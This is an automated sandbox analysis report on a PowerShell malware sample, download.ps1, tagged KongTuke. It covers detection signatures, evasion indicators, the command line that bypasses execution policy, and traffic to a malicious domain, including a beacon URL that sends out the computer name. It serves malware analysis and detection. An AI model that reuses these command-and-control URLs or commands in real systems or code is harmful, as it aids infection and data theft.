Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579696
MD5:59908f67a71ad9340c677542cc600f9e
SHA1:1213cf8e1e34acd11a68e6b4c4f4ce97abe06901
SHA256:0fd9309ca77dbf0977bbfa58941ef51ed866d6e79f03e5ba89e31743b8627901
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7716, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7716, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 16%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.7% probability
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32a source: powershell.exe, 00000000.00000002.1561232440.000001E51ADD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1561232440.000001E51ADD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1602977901.000001E534EC2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E53522A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1602977901.000001E534EBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdbonic0L source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbA source: powershell.exe, 00000000.00000002.1607895988.000001E5352E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1602977901.000001E534EC2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32h source: powershell.exe, 00000000.00000002.1561232440.000001E51ADD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbd source: powershell.exe, 00000000.00000002.1604648751.000001E5351A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Networking

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?id=$env:computername&key=$gqsylrwkvhi&s=527
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1604648751.000001E53522A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E6E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E38D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E38D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E70B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F63A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F30E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F60D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F61A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F62E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F2EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1561791044.000001E51CE71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E6E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E6FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1604648751.000001E53517A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.ciQ
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1561791044.000001E51CE71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E6FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/i
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:00;display:block;font-size:0;
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2
Source: powershell.exe, 00000000.00000002.1561791044.000001E51F315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B3979F60_2_00007FFB4B3979F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B3987A20_2_00007FFB4B3987A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B636FD30_2_00007FFB4B636FD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B6369A10_2_00007FFB4B6369A1
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2kUfkBjU7N7YK3npcJLy1raoq6yZP31" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="npJG8sQuYYnHoX_tDI_L0g">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="npJG8sQuYYnHoX_tDI_L0g">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="npJG8sQuYYnHoX_tDI_L0g">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="npJG8sQuYYnHoX_tDI_L0g">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
